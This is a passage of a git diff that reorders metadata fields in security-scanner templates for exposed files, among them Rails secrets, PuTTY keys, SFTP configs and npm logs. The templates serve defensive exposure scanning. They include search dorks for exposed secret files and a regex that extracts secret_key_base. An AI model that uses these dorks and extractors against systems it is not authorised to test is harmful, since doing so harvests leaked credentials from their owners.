metadata:
verified: true
max-request: 1
- shodan-query: title:"Oracle Application Server"
- product: http_server
vendor: oracle
+ product: http_server
+ shodan-query: title:"Oracle Application Server"
tags: oracle,exposure
- classification:
- cpe: cpe:2.3:a:oracle:http_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100cedd5def202f2be0f99bce0f6ef56cef370a476362385c7a9f0f14bea8797c4e022029197b802187e3b2f773f7dac74f7d482543a777feba337f46610766f52fdc01:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100cedd5def202f2be0f99bce0f6ef56cef370a476362385c7a9f0f14bea8797c4e022029197b802187e3b2f773f7dac74f7d482543a777feba337f46610766f52fdc01:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/php-ini.yaml b/http/exposures/files/php-ini.yaml
index ee16dd8ee7..1934e81556 100644
--- a/http/exposures/files/php-ini.yaml
+++ b/http/exposures/files/php-ini.yaml
@@ -6,16 +6,16 @@ info:
severity: low
description: php.ini file is exposed.
reference: https://www.php.net/manual/en/configuration.file.php
+ classification:
+ cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: php.ini
- product: php
vendor: php
+ product: php
+ shodan-query: php.ini
tags: config,exposure,files
- classification:
- cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502204791244ace57877a5bc4296a3919bcde88b1c690125558b459e4b90bf3ddc9a9022100c3d176771453ff2c912b50c6e2b76277e1080a1510b668914cf887991226e6a6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502204791244ace57877a5bc4296a3919bcde88b1c690125558b459e4b90bf3ddc9a9022100c3d176771453ff2c912b50c6e2b76277e1080a1510b668914cf887991226e6a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/phpunit-result-cache-exposure.yaml b/http/exposures/files/phpunit-result-cache-exposure.yaml
index 46d9449aba..0955a23d04 100644
--- a/http/exposures/files/phpunit-result-cache-exposure.yaml
+++ b/http/exposures/files/phpunit-result-cache-exposure.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: low
description: PHPUnit cache file is exposed.
+ classification:
+ cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:-:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: ".phpunit.result.cache"
- product: phpunit
vendor: phpunit_project
+ product: phpunit
+ shodan-query: ".phpunit.result.cache"
tags: config,exposure,devops,files
- classification:
- cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:-:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022043f5cb464ce98b2f50368b6a9109c466260171cae0be910601fdc522e75b260d022060013e8c4c77ccfbb8c29f2b943d0835e431e4c2bd2cf6deff507b7f7badca24:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022043f5cb464ce98b2f50368b6a9109c466260171cae0be910601fdc522e75b260d022060013e8c4c77ccfbb8c29f2b943d0835e431e4c2bd2cf6deff507b7f7badca24:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/pipeline-configuration.yaml b/http/exposures/files/pipeline-configuration.yaml
index 13e5762821..5c7d4389cd 100644
--- a/http/exposures/files/pipeline-configuration.yaml
+++ b/http/exposures/files/pipeline-configuration.yaml
@@ -4,16 +4,16 @@ info:
name: Pipeline Configuration Exposure
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:jenkins:pipeline\\:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"pipeline.yaml"
- product: pipeline\\
vendor: jenkins
+ product: pipeline\\
+ shodan-query: html:"pipeline.yaml"
tags: devops,exposure,cicd,files
- classification:
- cpe: cpe:2.3:a:jenkins:pipeline\\:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502205ff64e88f88b951c1d5ad0c0baa0db49ba8657abbceb296c6b7e45665b80351a022100a9757ad58008ce71a961f71a5b33dfec8b7dbc38b8912c2331319894bc79dc55:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502205ff64e88f88b951c1d5ad0c0baa0db49ba8657abbceb296c6b7e45665b80351a022100a9757ad58008ce71a961f71a5b33dfec8b7dbc38b8912c2331319894bc79dc55:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/putty-private-key-disclosure.yaml b/http/exposures/files/putty-private-key-disclosure.yaml
index a544e70997..2196fae093 100644
--- a/http/exposures/files/putty-private-key-disclosure.yaml
+++ b/http/exposures/files/putty-private-key-disclosure.yaml
@@ -7,16 +7,16 @@ info:
description: Putty internal user key file is exposed.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json
+ classification:
+ cpe: cpe:2.3:a:putty:putty:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 8
- github-query: filename:putty.ppk
- product: putty
vendor: putty
+ product: putty
+ github-query: filename:putty.ppk
tags: exposure,files
- classification:
- cpe: cpe:2.3:a:putty:putty:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -43,4 +43,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221009743a619b8ae5bbb216de2254c978a6aff3bceeb7cc54124697d3e8b2d7b5150022068d3fcc4ef1b0bcfb6c280cd87534daf8cce9751a796c0a344d8751af50b19a7:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221009743a619b8ae5bbb216de2254c978a6aff3bceeb7cc54124697d3e8b2d7b5150022068d3fcc4ef1b0bcfb6c280cd87534daf8cce9751a796c0a344d8751af50b19a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/redmine-settings.yaml b/http/exposures/files/redmine-settings.yaml
index c0319a87b4..9846143d01 100644
--- a/http/exposures/files/redmine-settings.yaml
+++ b/http/exposures/files/redmine-settings.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/5796
+ classification:
+ cpe: cpe:2.3:a:redmine:redmine:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- google-query: intitle:"index of" "settings.yml"
- product: redmine
vendor: redmine
+ product: redmine
+ google-query: intitle:"index of" "settings.yml"
tags: misconfig,redmine,devops,files,exposure
- classification:
- cpe: cpe:2.3:a:redmine:redmine:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,4 @@ http:
status:
- 200
-# digest: 4a0a004730450220186d23b24f9283dfe481d498f9cc88bf5cb7aaa3e997bb2d6ba6ebf7a1285dc2022100ede224056e027e6b184d789d782518d4463405ac3d2a3fd9864d46202deab695:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220186d23b24f9283dfe481d498f9cc88bf5cb7aaa3e997bb2d6ba6ebf7a1285dc2022100ede224056e027e6b184d789d782518d4463405ac3d2a3fd9864d46202deab695:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/ruby-rail-storage.yaml b/http/exposures/files/ruby-rail-storage.yaml
index 56f51cd5ea..0c7749e2a0 100644
--- a/http/exposures/files/ruby-rail-storage.yaml
+++ b/http/exposures/files/ruby-rail-storage.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: low
description: Ruby on Rails storage.yml file is disclosed.
+ classification:
+ cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
- google-query: intitle:"index of" storage.yml
- product: rails
vendor: rubyonrails
+ product: rails
+ google-query: intitle:"index of" storage.yml
tags: exposure,ruby,devops,files
- classification:
- cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -44,4 +44,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502200ee450f9ad85b2f4a8f1493f6bbfa9c70be1140679ac241496565825f46d6b6c022100a805eb547979651a0a9b66370195632fdb5091606fe033744e2acd93717be5a6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200ee450f9ad85b2f4a8f1493f6bbfa9c70be1140679ac241496565825f46d6b6c022100a805eb547979651a0a9b66370195632fdb5091606fe033744e2acd93717be5a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/secret-token-rb.yaml b/http/exposures/files/secret-token-rb.yaml
index b64267f36f..56b6c294cf 100644
--- a/http/exposures/files/secret-token-rb.yaml
+++ b/http/exposures/files/secret-token-rb.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: medium
description: Ruby Secret token is exposed.
+ classification:
+ cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- google-query: intitle:"index of" "secret_token.rb"
- product: rails
vendor: rubyonrails
+ product: rails
+ google-query: intitle:"index of" "secret_token.rb"
tags: redmine,devops,exposure,ruby,files
- classification:
- cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022025f5b925939cc1d42f8dc9b01ec2186c4e34e8e972e35116f3b9070227a351f6022100bf75273944ae4353ebd22e9fe8bfc3fa3182d098162dc13e02c7ade088516ec3:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022025f5b925939cc1d42f8dc9b01ec2186c4e34e8e972e35116f3b9070227a351f6022100bf75273944ae4353ebd22e9fe8bfc3fa3182d098162dc13e02c7ade088516ec3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/secrets-file.yaml b/http/exposures/files/secrets-file.yaml
index 517abcd270..1d2e79ff14 100644
--- a/http/exposures/files/secrets-file.yaml
+++ b/http/exposures/files/secrets-file.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: Ruby on Rails internal secret file is exposed.
reference: https://www.exploit-db.com/ghdb/6283
+ classification:
+ cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
- google-query: intitle:"index of" "secrets.yml"
- product: rails
vendor: rubyonrails
+ product: rails
+ google-query: intitle:"index of" "secrets.yml"
tags: cloud,devops,files,exposure,misconfig
- classification:
- cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -50,4 +50,5 @@ http:
group: 1
regex:
- 'secret_key_base: ([a-z0-9]+)'
-# digest: 4a0a004730450221008f3c78e37d6034c88fc8a231da592e10d3f0dd3cffc406c8f8ce4b3bb86ccf7802201eb77dae641b3f6691653ae35bfe9c03af2cc9716703b1d9288c516869363fbb:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221008f3c78e37d6034c88fc8a231da592e10d3f0dd3cffc406c8f8ce4b3bb86ccf7802201eb77dae641b3f6691653ae35bfe9c03af2cc9716703b1d9288c516869363fbb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/sendgrid-env.yaml b/http/exposures/files/sendgrid-env.yaml
index a35fcb8cc6..405887b3b2 100644
--- a/http/exposures/files/sendgrid-env.yaml
+++ b/http/exposures/files/sendgrid-env.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: medium
description: SendGrid file is exposed containing environment variables.
+ classification:
+ cpe: cpe:2.3:a:sendgrid:sendgrid:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"sendgrid.env"
- product: sendgrid
vendor: sendgrid
+ product: sendgrid
+ shodan-query: html:"sendgrid.env"
tags: exposure,sendgrid,key,api,files
- classification:
- cpe: cpe:2.3:a:sendgrid:sendgrid:*:*:*:*:wordpress:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
status:
- 429
negative: true
-# digest: 4a0a0047304502205a88c97956ef974c3f3d8d386cf6c5821dc0b471e9fbb17a7c198d08441dd105022100d39f0631cd20d813b18f61131b18dc37002b08255ea6cb627443e72543f809c6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205a88c97956ef974c3f3d8d386cf6c5821dc0b471e9fbb17a7c198d08441dd105022100d39f0631cd20d813b18f61131b18dc37002b08255ea6cb627443e72543f809c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/svn-wc-db.yaml b/http/exposures/files/svn-wc-db.yaml
index 7f2813e89b..e5a6053954 100644
--- a/http/exposures/files/svn-wc-db.yaml
+++ b/http/exposures/files/svn-wc-db.yaml
@@ -9,16 +9,16 @@ info:
- https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt
- https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/svn_wcdb_scanner.rb
- https://infosecwriteups.com/indias-aadhar-card-source-code-disclosure-via-exposed-svn-wc-db-c05519ea7761
+ classification:
+ cpe: cpe:2.3:a:apache:subversion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- google-query: intitle:"index of" "wc.db"
- product: subversion
vendor: apache
+ product: subversion
+ google-query: intitle:"index of" "wc.db"
tags: msf,exposure,svn,config,files
- classification:
- cpe: cpe:2.3:a:apache:subversion:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502207b3da2350ab0dfe42fea1b9232ea351923200d1ea45bd9d3ae7a0c20ab8b1a5102210094ee3f8bfe328ad9a92ca4f3473a4e14a0dfe5e9f2a598b38282b826b31c7f38:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502207b3da2350ab0dfe42fea1b9232ea351923200d1ea45bd9d3ae7a0c20ab8b1a5102210094ee3f8bfe328ad9a92ca4f3473a4e14a0dfe5e9f2a598b38282b826b31c7f38:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/symfony-properties-ini.yaml b/http/exposures/files/symfony-properties-ini.yaml
index f59b6ee2b4..09c16ca92b 100644
--- a/http/exposures/files/symfony-properties-ini.yaml
+++ b/http/exposures/files/symfony-properties-ini.yaml
@@ -4,16 +4,16 @@ info:
name: Symfony properties.ini File Disclosure
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- google-query: intitle:"index of" "properties.ini"
- product: symfony
vendor: sensiolabs
+ product: symfony
+ google-query: intitle:"index of" "properties.ini"
tags: symfony,exposure,files
- classification:
- cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
status:
- 200
-# digest: 4b0a004830460221009c590f650284445bb511c472384938202529e15f42e37b04696036b32a3433a2022100bcf4ae8450540eb6376b9a70814dc8d440160159dc139c5579fb4107bc84e23c:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221009c590f650284445bb511c472384938202529e15f42e37b04696036b32a3433a2022100bcf4ae8450540eb6376b9a70814dc8d440160159dc139c5579fb4107bc84e23c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/symfony-security.yaml b/http/exposures/files/symfony-security.yaml
index bb59999dec..20c09b47b2 100644
--- a/http/exposures/files/symfony-security.yaml
+++ b/http/exposures/files/symfony-security.yaml
@@ -4,16 +4,16 @@ info:
name: Symfony security.yml File Disclosure
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- google-query: intitle:"index of" "security.yml"
- product: symfony
vendor: sensiolabs
+ product: symfony
+ google-query: intitle:"index of" "security.yml"
tags: symfony,devops,exposure,files
- classification:
- cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
status:
- 200
-# digest: 490a0046304402206b983d3e4e1ef38d3b4cae7cb19f910b490bd9d810342b577fd73e30f95ce72802206402029e10542ce58e676260699f3ec277efb05242fa7682891cd42ab28e0d40:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206b983d3e4e1ef38d3b4cae7cb19f910b490bd9d810342b577fd73e30f95ce72802206402029e10542ce58e676260699f3ec277efb05242fa7682891cd42ab28e0d40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/token-info-json.yaml b/http/exposures/files/token-info-json.yaml
index 1604b1761b..7afddef6ee 100644
--- a/http/exposures/files/token-info-json.yaml
+++ b/http/exposures/files/token-info-json.yaml
@@ -4,16 +4,16 @@ info:
name: Token Info Json File
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:sample_token_project:sample_token:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- google-query: intitle:"index of" "token_info.json"
- product: sample_token
vendor: sample_token_project
+ product: sample_token
+ google-query: intitle:"index of" "token_info.json"
tags: exposure,files
- classification:
- cpe: cpe:2.3:a:sample_token_project:sample_token:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100f420ba79911fd29c63f7365743ff05b6c6eef9e687e4700db013f8e42edae392022100f0aade0d69ca9f6b387ef97843030a9f59a1b7a2a02a84c494cbb3986b8dbeb7:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100f420ba79911fd29c63f7365743ff05b6c6eef9e687e4700db013f8e42edae392022100f0aade0d69ca9f6b387ef97843030a9f59a1b7a2a02a84c494cbb3986b8dbeb7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/uwsgi-ini.yaml b/http/exposures/files/uwsgi-ini.yaml
index 8956431cae..2ce78b912f 100644
--- a/http/exposures/files/uwsgi-ini.yaml
+++ b/http/exposures/files/uwsgi-ini.yaml
@@ -4,16 +4,16 @@ info:
name: uwsgi.ini File Exposure
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"uwsgi.ini"
- product: uwsgi
vendor: unbit
+ product: uwsgi
+ shodan-query: html:"uwsgi.ini"
tags: exposure,uwsgi,files
- classification:
- cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100ea5c8e3dccd08443fd1e42d07613be036ff5246ced60b3bcc4d89c078f010b2d022100d2acba3ca576db38777ff49c3a1ef45f6dd94e328787434c8ef6be296a33f9d5:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100ea5c8e3dccd08443fd1e42d07613be036ff5246ced60b3bcc4d89c078f010b2d022100d2acba3ca576db38777ff49c3a1ef45f6dd94e328787434c8ef6be296a33f9d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/viminfo-disclosure.yaml b/http/exposures/files/viminfo-disclosure.yaml
index 98e1d697ac..762d62e6e1 100644
--- a/http/exposures/files/viminfo-disclosure.yaml
+++ b/http/exposures/files/viminfo-disclosure.yaml
@@ -8,16 +8,16 @@ info:
Viminfo file was detected.
reference:
- https://renenyffenegger.ch/notes/development/vim/editing/viminfo/index
+ classification:
+ cpe: cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Viminfo"
- product: vim
vendor: vim
+ product: vim
+ shodan-query: html:"Viminfo"
tags: devops,exposure,viminfo,config
- classification:
- cpe: cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -41,4 +41,4 @@ http:
status:
- 200
-# digest: 490a004630440220778d9bfb13df46593453e6e11bbae8931112f2d6b97b5e4a5825d0eeae42af8202202f27116c557a1ee76a284cc98400bdb792a88f95295f2b710cc4fb110a936278:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220778d9bfb13df46593453e6e11bbae8931112f2d6b97b5e4a5825d0eeae42af8202202f27116c557a1ee76a284cc98400bdb792a88f95295f2b710cc4fb110a936278:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/vscode-sftp.yaml b/http/exposures/files/vscode-sftp.yaml
index 4a5e5b3b77..ca30c0f0bd 100644
--- a/http/exposures/files/vscode-sftp.yaml
+++ b/http/exposures/files/vscode-sftp.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
It discloses sensitive files created by vscode-sftp for VSCode, contains SFTP/SSH server details and credentials.
+ classification:
+ cpe: cpe:2.3:a:microsoft:visual_studio_code:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- shodan-query: html:"sftp.json"
- product: visual_studio_code
vendor: microsoft
+ product: visual_studio_code
+ shodan-query: html:"sftp.json"
tags: exposure,vscode,sftp,ssh,files
- classification:
- cpe: cpe:2.3:a:microsoft:visual_studio_code:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -44,4 +44,4 @@ http:
status:
- 200
-# digest: 4a0a004730450221008b29d9873ec6870c1fe305232d363e69bec8f6146f66709fbf4468d6bce2d06f022078c30674b21f491c4efe798f52fe349e226fe072c62dacc6cbd1eb60c62d8cce:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221008b29d9873ec6870c1fe305232d363e69bec8f6146f66709fbf4468d6bce2d06f022078c30674b21f491c4efe798f52fe349e226fe072c62dacc6cbd1eb60c62d8cce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/webpack-mix-js.yaml b/http/exposures/files/webpack-mix-js.yaml
index 663b4e6177..1d0a810168 100644
--- a/http/exposures/files/webpack-mix-js.yaml
+++ b/http/exposures/files/webpack-mix-js.yaml
@@ -4,16 +4,16 @@ info:
name: Webpack Mix File Disclosure
author: DhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:a:webpack.js:webpack:*:*:*:*:node.js:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"webpack.mix.js"
- product: webpack
vendor: webpack.js
+ product: webpack
+ shodan-query: html:"webpack.mix.js"
tags: config,exposure,devops,files
- classification:
- cpe: cpe:2.3:a:webpack.js:webpack:*:*:*:*:node.js:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022056e38db849c6e5b821a0cc291fc8e296c1aa9524a15597bbcd9a7b60d02d74420221009200ffd999ffb9d9442590767bbc02ac794e79cdd373c6a7dd9151cdc70bb3b4:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022056e38db849c6e5b821a0cc291fc8e296c1aa9524a15597bbcd9a7b60d02d74420221009200ffd999ffb9d9442590767bbc02ac794e79cdd373c6a7dd9151cdc70bb3b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/wp-cli-exposure.yaml b/http/exposures/files/wp-cli-exposure.yaml
index c050c6df4b..abbe56bb08 100644
--- a/http/exposures/files/wp-cli-exposure.yaml
+++ b/http/exposures/files/wp-cli-exposure.yaml
@@ -4,16 +4,16 @@ info:
name: WP-CLI Yaml File Exposure
author: DhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:a:wp-cli:wp-cli:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"wp-cli.yml"
- product: wp-cli
vendor: wp-cli
+ product: wp-cli
+ shodan-query: html:"wp-cli.yml"
tags: config,exposure,wp-cli,files
- classification:
- cpe: cpe:2.3:a:wp-cli:wp-cli:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
status:
- 200
-# digest: 490a00463044022003699009e01e265a721223cb412bd19c629527a0d37f02a57723061054d81d7d02206fbb5502dbfce7bb40f70212f2a7e1feeabb20da376a7c9811713f9045b4b651:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022003699009e01e265a721223cb412bd19c629527a0d37f02a57723061054d81d7d02206fbb5502dbfce7bb40f70212f2a7e1feeabb20da376a7c9811713f9045b4b651:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/ws-ftp-ini.yaml b/http/exposures/files/ws-ftp-ini.yaml
index f74a948ab9..1b9c8cad91 100644
--- a/http/exposures/files/ws-ftp-ini.yaml
+++ b/http/exposures/files/ws-ftp-ini.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: low
description: WS FTP file is disclosed.
+ classification:
+ cpe: cpe:2.3:a:ipswitch:ws_ftp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- google-query: intitle:"Index of" ws_ftp.ini
- product: ws_ftp
vendor: ipswitch
+ product: ws_ftp
+ google-query: intitle:"Index of" ws_ftp.ini
tags: exposure,ftp,files
- classification:
- cpe: cpe:2.3:a:ipswitch:ws_ftp:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221009ea31a3317446f7a301ca1361942add6d318a0542fde33aef0647ba6294de12e0221008fa0c1b2de309a3b4949698253fadf3344e74f286a907e365f9b98d9085a00b1:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221009ea31a3317446f7a301ca1361942add6d318a0542fde33aef0647ba6294de12e0221008fa0c1b2de309a3b4949698253fadf3344e74f286a907e365f9b98d9085a00b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/fastcgi-echo.yaml b/http/exposures/logs/fastcgi-echo.yaml
index 2f9c53d0a0..067a6576d4 100644
--- a/http/exposures/logs/fastcgi-echo.yaml
+++ b/http/exposures/logs/fastcgi-echo.yaml
@@ -10,16 +10,16 @@ info:
reference:
- https://www.exploit-db.com/ghdb/183
- https://www.integrigy.com/oracle-application-server-fastcgi-echo-vulnerability-reports
+ classification:
+ cpe: cpe:2.3:a:fastcgi:fcgi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- google-query: inurl:fcgi-bin/echo
- product: fcgi
vendor: fastcgi
+ product: fcgi
+ google-query: inurl:fcgi-bin/echo
tags: exposure,logs,oracle,fastcgi,edb
- classification:
- cpe: cpe:2.3:a:fastcgi:fcgi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -41,4 +41,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100c1515f3e8783832b51ecb2f9f9c894bbc5850ba330d49ebcdad5e01313db1abf022100b7bdb610aef885d22f7ee4934f754bed143ca8ed501c966a8218f328e3279502:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c1515f3e8783832b51ecb2f9f9c894bbc5850ba330d49ebcdad5e01313db1abf022100b7bdb610aef885d22f7ee4934f754bed143ca8ed501c966a8218f328e3279502:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/npm-debug-log.yaml b/http/exposures/logs/npm-debug-log.yaml
index c47a4a7d97..39ce72790a 100644
--- a/http/exposures/logs/npm-debug-log.yaml
+++ b/http/exposures/logs/npm-debug-log.yaml
@@ -8,16 +8,16 @@ info:
reference:
- https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt
- https://docs.npmjs.com/generating-and-locating-npm-debug.log-files
+ classification:
+ cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- github-query: filename:npm-debug.log
- product: npm
vendor: npmjs
+ product: npm
+ github-query: filename:npm-debug.log
tags: exposure,npm,logs,debug
- classification:
- cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100db233ec77fffd7ac6156a1aa42178960658c69f7b7a0eda7b9da2800bf56865102206694c2b9fb3e6abb338df283679eeff18e1a2dfa310960321515ba3c8c9114e3:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100db233ec77fffd7ac6156a1aa42178960658c69f7b7a0eda7b9da2800bf56865102206694c2b9fb3e6abb338df283679eeff18e1a2dfa310960321515ba3c8c9114e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/npm-log-file.yaml b/http/exposures/logs/npm-log-file.yaml
index b21c1f84f6..eee96c3fd6 100644
--- a/http/exposures/logs/npm-log-file.yaml
+++ b/http/exposures/logs/npm-log-file.yaml
@@ -7,16 +7,16 @@ info:
description: NPM log file is exposed to external users.
reference:
- https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt
+ classification:
+ cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"npm-debug.log"
- product: npm
vendor: npmjs
+ product: npm
+ shodan-query: html:"npm-debug.log"
tags: npm,logs,exposure
- classification:
- cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205e083212c9e6ba90039b1774aed2b95d777c39b873fd4f9ee5792e4dbce2c9fc022061be5d69ed392493f0721e1fcd850d753b9fcb490ff8c4d10aacbaa18e2e5a48:922c64590222798bb761d5b6d8e72950
+
